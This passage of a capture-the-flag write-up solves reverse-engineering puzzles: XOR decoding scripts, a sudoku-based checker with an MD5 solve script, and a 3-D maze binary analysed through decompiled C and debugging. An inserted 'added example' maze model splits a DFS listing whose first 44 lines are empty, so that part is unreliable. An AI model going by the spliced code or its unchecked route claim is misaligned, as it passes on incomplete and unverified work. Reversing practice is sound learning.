class="hljs-string">'t'</span>,<span class="hljs-string">'0'</span>)<br>a=a.replace(<span class="hljs-string">'4'</span>,<span class="hljs-string">'c'</span>)<br>a=a.replace(<span class="hljs-string">'-'</span>,<span class="hljs-string">'+'</span>)<br><br>a=a[::-<span class="hljs-number">1</span>]<br>a=base64.decodebytes(a.encode(<span class="hljs-string">'utf-8'</span>))<br>a=a.decode(<span class="hljs-string">'utf-8'</span>)<br>a=<span class="hljs-built_in">list</span>(a)<br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(a)):<br> a[i]=(<span class="hljs-built_in">ord</span>(a[i])-<span class="hljs-number">3</span>)^<span 
class="hljs-number">8</span><br> <span class="hljs-built_in">print</span>(<span class="hljs-built_in">chr</span>(a[i]),end=<span class="hljs-string">''</span>)<br></code></pre></td></tr></table></figure><h3 id="WEEK2-Authur’s-box"><a href="#WEEK2-Authur’s-box" class="headerlink" title="[WEEK2]Authur’s_box"></a>[WEEK2]Authur’s_box</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs python">a=[<span class="hljs-number">0xAD</span>,<span class="hljs-number">0xA7</span>,<span class="hljs-number">0xAA</span>,<span class="hljs-number">0xAC</span>,<span class="hljs-number">0xB0</span>,<span class="hljs-number">0xF8</span>,<span class="hljs-number">0xA8</span>,<span class="hljs-number">0xFE</span>,<span class="hljs-number">0xAF</span>,<span class="hljs-number">0xFF</span>,<span class="hljs-number">0xF3</span>,<span class="hljs-number">0xA9</span>,<span class="hljs-number">0xA8</span>,<span class="hljs-number">0xE6</span>,<span class="hljs-number">0xFF</span>,<span class="hljs-number">0xFE</span>,<span class="hljs-number">0xF2</span>,<span class="hljs-number">0xFE</span>,<span class="hljs-number">0xE6</span>,<span class="hljs-number">0xFF</span>,<span class="hljs-number">0xFC</span>,<span class="hljs-number">0xF2</span>,<span class="hljs-number">0xAD</span>,<span class="hljs-number">0xE6</span>,<span class="hljs-number">0xA9</span>,<span class="hljs-number">0xFD</span>,<span class="hljs-number">0xFF</span>,<span class="hljs-number">0xF9</span>,<span class="hljs-number">0xE6</span>,<span class="hljs-number">0xA8</span>,<span class="hljs-number">0xAD</span>,<span class="hljs-number">0xA8</span>,<span class="hljs-number">0xF2</span>,<span class="hljs-number">0xA8</span>,<span class="hljs-number">0xAD</span>,<span class="hljs-number">0xFD</span>,<span 
class="hljs-number">0xF3</span>,<span class="hljs-number">0xAF</span>,<span class="hljs-number">0xF3</span>,<span class="hljs-number">0xAD</span>,<span class="hljs-number">0xFA</span>,<span class="hljs-number">0xB0</span>]<br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(a)):<br> a[i]=a[i]^<span class="hljs-number">0xcb</span><br> <span class="hljs-built_in">print</span>(<span class="hljs-built_in">chr</span>(a[i]),end=<span class="hljs-string">''</span>)<br></code></pre></td></tr></table></figure><h3 id="WEEK2-签到题?"><a href="#WEEK2-签到题?" class="headerlink" title="[WEEK2]签到题?"></a>[WEEK2]签到题? (sign-in?)</h3><p>This one left me a bit confused, though to be fair it really is a sign-in.</p><p>Just read the value out under the debugger and base64-decode it; that gives the flag.</p><p><img src="C:\Users\a\AppData\Roaming\Typora\typora-user-images\image-20231031124243081.png" alt="image-20231031124243081"></p><p><img src="C:\Users\a\AppData\Roaming\Typora\typora-user-images\image-20231031124515480.png" alt="image-20231031124515480"></p><h3 id="WEEK2-not-gcc"><a href="#WEEK2-not-gcc" class="headerlink" title="[WEEK2]not gcc"></a>[WEEK2]not gcc</h3><p><a href="https://blog.csdn.net/pc153262603/article/details/89553688">Common clang / llc / llvm compile commands (CSDN blog)</a></p><p><a href="https://www.cnblogs.com/ren-ctfnote/p/14948764.html">2021 CISCN reverse, baby.bc: notes on the key points (re0juren, cnblogs.com)</a></p><figure class="highlight mipsasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs mipsasm">clang <span class="hljs-keyword">baby.bc </span>-o <span class="hljs-keyword">baby</span><br></code></pre></td></tr></table></figure><p>Compile the LLVM bitcode into an executable with that command, then analyse the result as usual.</p><p>The key function is Sudoku. It walks the 81 input characters over the 9x9 map: at a cell the puzzle already fills it demands a '0' and fails otherwise, and at an empty cell it stores our character into the map. So the expected input is the solved grid with every given cell replaced by 0 (a bit roundabout).</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span 
class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><code class="hljs c">__int64 __fastcall <span class="hljs-title function_">Sudoku</span><span class="hljs-params">(<span class="hljs-type">char</span> *a1)</span><br>{<br> <span class="hljs-type">int</span> v2; <span class="hljs-comment">// [rsp+8h] [rbp-1Ch]</span><br> <span class="hljs-type">int</span> j; <span class="hljs-comment">// [rsp+Ch] [rbp-18h]</span><br> <span class="hljs-type">int</span> i; <span class="hljs-comment">// [rsp+10h] [rbp-14h]</span><br><br> <span class="hljs-keyword">for</span> ( i = <span class="hljs-number">0</span>; i < <span class="hljs-number">9</span>; ++i )<br> {<br> <span class="hljs-keyword">for</span> ( j = <span class="hljs-number">0</span>; j < <span class="hljs-number">9</span>; ++j )<br> {<br> v2 = *a1;<br> <span class="hljs-keyword">if</span> ( <span class="hljs-built_in">map</span>[<span class="hljs-number">9</span> * i + j] )<br> {<br> <span class="hljs-keyword">if</span> ( v2 != <span class="hljs-number">48</span> )<br> <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br> }<br> <span class="hljs-keyword">else</span><br> {<br> <span class="hljs-built_in">map</span>[<span class="hljs-number">9</span> * i + j] = v2;<br> }<br> }<br> }<br> <span class="hljs-keyword">return</span> <span 
class="hljs-number">1</span>;<br>}<br><br></code></pre></td></tr></table></figure><p>It is a sudoku. Extract the values from map, solve the puzzle on an online sudoku solver, then apply the rule above to the original map to obtain the string we have to send.</p><p><img src="C:\Users\a\AppData\Roaming\Typora\typora-user-images\image-20231031125334209.png" alt="image-20231031125334209"></p><p>XOR does that in one pass: where the puzzle digit equals the solution digit (a given cell) the result is 0, and where the puzzle has 0 the result is the solution digit itself. The script then prints the MD5 of the resulting string:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> hashlib<br><br>a=<span class="hljs-string">"407003208500020900012980004709104800061000470003270006086300040020740630304002000"</span><br>b=<span class="hljs-string">"497513268538426917612987354759164823261839475843275196986351742125748639374692581"</span><br>c=<span class="hljs-string">''</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(a)):<br> c+=<span class="hljs-built_in">str</span>(<span class="hljs-built_in">int</span>(a[i])^<span class="hljs-built_in">int</span>(b[i]))<br> <span class="hljs-comment"># print(int(a[i])^int(b[i]),end='')</span><br><span class="hljs-comment"># print(c)</span><br><span class="hljs-comment"># 090510060038406017600007350050060023200839005840005190900051702105008009070690581</span><br>d=hashlib.md5()<br>d.update(c.encode()) <span class="hljs-comment"># hash the string just built (value shown above)</span><br><span 
class="hljs-built_in">print</span>(d.hexdigest())<br></code></pre></td></tr></table></figure><h3 id="WEEK2-Run-润!"><a href="#WEEK2-Run-润!" class="headerlink" title="[WEEK2]Run?润!"></a>[WEEK2]Run?润!</h3><p>A maze challenge. I read up on the DFS and BFS algorithms used for this kind of problem (given the map, the path comes out in one go) and on how to recover the map under the debugger.</p><p><a href="https://mp.weixin.qq.com/s/T6ML7zwA57JXTRwOZqcxhw?spm=a2c6h.12873639.article-detail.7.19f31041PU5YhX">WeChat public account article (qq.com)</a></p><p><a href="https://blog.csdn.net/Sciurdae/article/details/133963882">CTF reverse: analysing maze-map challenges with DFS and BFS (study notes, CSDN blog)</a></p><p><a href="https://blog.csdn.net/Sciurdae/article/details/133964592">SHCTF2023 Reverse week2 full write-up (CSDN blog)</a></p><p>sub_401A26() is the map generator. It is called once at the start and again later while walking the maze. It takes the two 32-bit words dword_404020[2 * dword_408040] and dword_404020[2 * dword_408040 + 1], selected by the current layer, and expands them bit by bit from the most significant bit down into 64 one-bit cells of dword_408060, i.e. one layer of the maze.</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><code class="hljs c">_DWORD *<span class="hljs-title function_">sub_401A26</span><span class="hljs-params">()</span><br>{<br> <span class="hljs-type">int</span> v0; <span class="hljs-comment">// eax</span><br> __int64 v1; <span class="hljs-comment">// rdx</span><br> _DWORD *result; <span class="hljs-comment">// rax</span><br> <span class="hljs-type">int</span> j; <span class="hljs-comment">// [rsp+4h] [rbp-Ch]</span><br> <span class="hljs-type">int</span> i; <span 
class="hljs-comment">// [rsp+8h] [rbp-8h]</span><br> <span class="hljs-type">int</span> v5; <span class="hljs-comment">// [rsp+Ch] [rbp-4h]</span><br><br> v5 = <span class="hljs-number">0</span>;<br> <span class="hljs-keyword">for</span> ( i = <span class="hljs-number">0</span>; i <= <span class="hljs-number">1</span>; ++i )<br> {<br> <span class="hljs-keyword">for</span> ( j = <span class="hljs-number">31</span>; j >= <span class="hljs-number">0</span>; --j )<br> {<br> v0 = v5++;<br> v1 = v0;<br> result = dword_408060;<br> dword_408060[v1] = (dword_404020[<span class="hljs-number">2</span> * dword_408040 + i] >> j) & <span class="hljs-number">1</span>;<br> }<br> }<br> <span class="hljs-keyword">return</span> result;<br>}<br></code></pre></td></tr></table></figure><p><img src="C:\Users\a\AppData\Roaming\Typora\typora-user-images\image-20231031181941311.png" alt="image-20231031181941311"></p><p>v8 = sub_401AAF(v8, Str[i]); is the core routine, called from main for every character of the input. Reading its code shows that this is a three-dimensional maze: u and q move along x (the layer), each adding or subtracting 64 from the position, and dword_408040 records the current layer, incremented by u and decremented by q from an initial value of 0; w and s move along y (the row within a layer), each adding or subtracting 8; a and d move along z (the column within a row), each adding or subtracting 1. A move is rejected with "You crossed the line!" and exit(0) when the layer counter leaves 0..7, when the new index exceeds 511, or when the target entry of dword_408060 is non-zero, i.e. a wall.</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span 
class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><code class="hljs c">__int64 __fastcall <span class="hljs-title function_">sub_401AAF</span><span class="hljs-params">(<span class="hljs-type">int</span> a1, <span class="hljs-type">char</span> a2)</span><br>{<br> <span class="hljs-type">int</span> v3; <span class="hljs-comment">// [rsp+30h] [rbp+10h]</span><br><br> <span class="hljs-keyword">switch</span> ( a2 )<br> {<br> <span class="hljs-keyword">case</span> <span class="hljs-string">'a'</span>:<br> v3 = a1 - <span class="hljs-number">1</span>;<br> <span class="hljs-keyword">goto</span> LABEL_12;<br> <span class="hljs-keyword">case</span> <span class="hljs-string">'d'</span>:<br> v3 = a1 + <span class="hljs-number">1</span>;<br> <span class="hljs-keyword">goto</span> LABEL_12;<br> <span class="hljs-keyword">case</span> <span class="hljs-string">'q'</span>:<br> v3 = a1 - <span class="hljs-number">64</span>;<br> <span class="hljs-keyword">if</span> ( --dword_408040 < <span class="hljs-number">0</span> )<br> {<br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"You crossed the line!Get out of here!"</span>);<br> <span class="hljs-built_in">exit</span>(<span 
class="hljs-number">0</span>);<br> }<br> <span class="hljs-keyword">goto</span> LABEL_11;<br> <span class="hljs-keyword">case</span> <span class="hljs-string">'s'</span>:<br> v3 = a1 + <span class="hljs-number">8</span>;<br> <span class="hljs-keyword">goto</span> LABEL_12;<br> <span class="hljs-keyword">case</span> <span class="hljs-string">'u'</span>:<br> v3 = a1 + <span class="hljs-number">64</span>;<br> <span class="hljs-keyword">if</span> ( ++dword_408040 > <span class="hljs-number">7</span> )<br> {<br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"You crossed the line!Get out of here!"</span>);<br> <span class="hljs-built_in">exit</span>(<span class="hljs-number">0</span>);<br> }<br>LABEL_11:<br> sub_401A26();<br> <span class="hljs-keyword">goto</span> LABEL_12;<br> <span class="hljs-keyword">case</span> <span class="hljs-string">'w'</span>:<br> v3 = a1 - <span class="hljs-number">8</span>;<br>LABEL_12:<br> <span class="hljs-keyword">if</span> ( v3 > <span class="hljs-number">511</span> )<br> <span class="hljs-keyword">goto</span> LABEL_16;<br> <span class="hljs-keyword">if</span> ( dword_408060[v3] )<br> {<br> dword_408044 = <span class="hljs-number">1</span>;<br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"You crossed the line!Get out of here!"</span>);<br> <span class="hljs-built_in">exit</span>(<span class="hljs-number">0</span>);<br> }<br> <span class="hljs-keyword">return</span> (<span class="hljs-type">unsigned</span> <span class="hljs-type">int</span>)v3;<br> <span class="hljs-keyword">default</span>:<br>LABEL_16:<br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"You crossed the line!Get out of here!"</span>);<br> <span class="hljs-built_in">exit</span>(<span class="hljs-number">0</span>);<br> 
}<br>}<br></code></pre></td></tr></table></figure><p>With the source analysed, the next question is how to recover the maze. I did it with dynamic debugging: feed a long run of u so that every iteration takes the u branch, because sub_401A26() builds the map from dword_408040 and that value has to change. Each u regenerates the map for the corresponding layer; after each call I manually set RIP back to 0x0000000000401B0F so that execution re-enters the u case, dword_408040 is incremented once more and sub_401A26 runs again, until dword_408040 would exceed 7. By then it is also clear that this is an 8x8x8 three-dimensional maze.</p><p><img src="C:\Users\a\AppData\Roaming\Typora\typora-user-images\image-20231031182756375.png" alt="image-20231031182756375"></p><p>Once the maze has been dumped we can run a script or read the route out by hand. The DFS below prints the candidate moves at every step and keeps searching after it has printed a solution, so the route to keep is the printed path string.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span 
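class="added"></span><br></pre></td></tr></table></figure><p>As an added example, not the write-up's own script, the following models what the two routines above do, so the maze can be reconstructed and a route checked without stepping through the binary: pack_layer and unpack_layer replicate sub_401A26's bit layout (two 32-bit words per layer, bit 31 first, one bit per cell), step replicates sub_401AAF's index arithmetic and bounds checks, and a BFS finds the shortest route with true three-dimensional neighbours. The maze is transcribed from the 512-entry list in the DFS script below into eight 8x8 character layers (the exit marked E); the word packing is my reconstruction of the format dword_404020 must hold, since the raw words are not in the write-up.</p>

```python
"""Added example (not the write-up's script): model the maze binary's layer
unpacking (sub_401A26) and move checker (sub_401AAF), then find and verify a path."""
from collections import deque

WALL, OPEN, EXIT = 1, 0, 2

# The 8x8x8 maze transcribed from the write-up's dump: LAYERS[x][y][z],
# '#' = wall (1), '.' = open (0), 'E' = the exit cell (2 in the dump).
LAYERS = [
    (".#......", ".#######", "....####", "###.####", "###.####", "########", "########", "########"),
    ("###.###.", "########", "########", "########", "###.####", "########", "########", "########"),
    ("###.###.", "#######.", "#####...", "########", "###.####", "########", "########", "########"),
    ("###.####", "###.####", "###.#.##", "###.####", "###.####", "########", "########", "########"),
    ("########", "########", "#####.##", "########", "########", "########", "........", "########"),
    ("########", "########", "......##", ".#######", ".#######", ".#######", ".######.", "########"),
    ("########", "########", "########", "#####...", "#####.#.", "#######.", "#######.", "########"),
    ("########", "########", "########", "########", "#####.##", "#####.##", "#####.##", "#####..E"),
]
# The route the write-up's DFS printed.
PAGE_PATH = "ssdddssuuuwwwwqqqdddduussaauuuaaaaassssqddddddduuwwwaasusssdd"


def build_map(layers):
    """Flatten to the binary's index scheme: idx = x*64 + y*8 + z."""
    return [{"#": WALL, ".": OPEN, "E": EXIT}[ch] for layer in layers for row in layer for ch in row]


def pack_layer(cells, x):
    """Pack layer x into the two 32-bit words (dword_404020[2*x], [2*x+1]) that
    sub_401A26 consumes: word i holds cells i*32..i*32+31, bit 31 first."""
    words = []
    for i in range(2):
        w = 0
        for j in range(32):
            w = (w << 1) | (1 if cells[x * 64 + i * 32 + j] == WALL else 0)
        words.append(w)
    return words


def unpack_layer(words):
    """sub_401A26's loop: for i in 0..1, j = 31 down to 0, cell = (word[i] >> j) & 1."""
    return [(words[i] >> j) & 1 for i in range(2) for j in range(31, -1, -1)]


# sub_401AAF: letter -> (index delta, layer-counter delta)
MOVES = {"a": (-1, 0), "d": (1, 0), "w": (-8, 0), "s": (8, 0), "q": (-64, -1), "u": (64, 1)}


def step(cells, pos, layer, move):
    """One move under the binary's rules; None means 'You crossed the line'.
    Caveat: a/d and w/s are pure index arithmetic, so 'a' at column 0 lands on
    column 7 of the previous row; the binary has no check for that."""
    if move not in MOVES:
        return None
    d_idx, d_layer = MOVES[move]
    layer += d_layer
    if layer < 0 or layer > 7:      # the q/u layer-counter checks
        return None
    pos += d_idx
    if pos < 0 or pos > 511:        # binary checks only > 511; negative is out of bounds too
        return None
    if cells[pos] == WALL:          # dword_408060[v3] != 0
        return None
    return pos, layer


def replay(cells, path):
    """Walk a move string from cell 0; True only if every move is accepted and it ends on EXIT."""
    pos, layer = 0, 0
    for m in path:
        r = step(cells, pos, layer, m)
        if r is None:
            return False
        pos, layer = r
    return cells[pos] == EXIT


DIRS = {"q": (-1, 0, 0), "u": (1, 0, 0), "w": (0, -1, 0), "s": (0, 1, 0), "a": (0, 0, -1), "d": (0, 0, 1)}


def bfs(cells):
    """Shortest route from cell 0 to EXIT using true 3-D neighbours (no row wrap), or None."""
    goal = cells.index(EXIT)
    prev = {0: None}
    queue = deque([0])
    while queue:
        cur = queue.popleft()
        if cur == goal:
            break
        x, y, z = cur // 64, (cur // 8) % 8, cur % 8
        for m, (dx, dy, dz) in DIRS.items():
            nx, ny, nz = x + dx, y + dy, z + dz
            if not (0 <= nx < 8 and 0 <= ny < 8 and 0 <= nz < 8):
                continue
            n = nx * 64 + ny * 8 + nz
            if cells[n] == WALL or n in prev:
                continue
            prev[n] = (cur, m)
            queue.append(n)
    if goal not in prev:
        return None
    moves = []
    n = goal
    while prev[n] is not None:
        n, m = prev[n]
        moves.append(m)
    return "".join(reversed(moves))


if __name__ == "__main__":
    cells = build_map(LAYERS)
    route = bfs(cells)
    print(route, len(route), replay(cells, route))
```

<p>replay() accepts exactly what the binary accepts, including the row-wrap moves noted in step(); bfs() deliberately uses proper 3-D neighbours so the route it returns never relies on that quirk. Running the script prints the 61-move route, which is the same string the DFS below finds.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span 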
class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br></pre></td><td class="code"><pre><code class="hljs python">maze = [<span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>,<br> <span 
class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>,<br> <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span 
class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>,<br> <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>,<br> <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span 
class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>,<br> <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>,<br> <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span 
class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>,<br> <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span 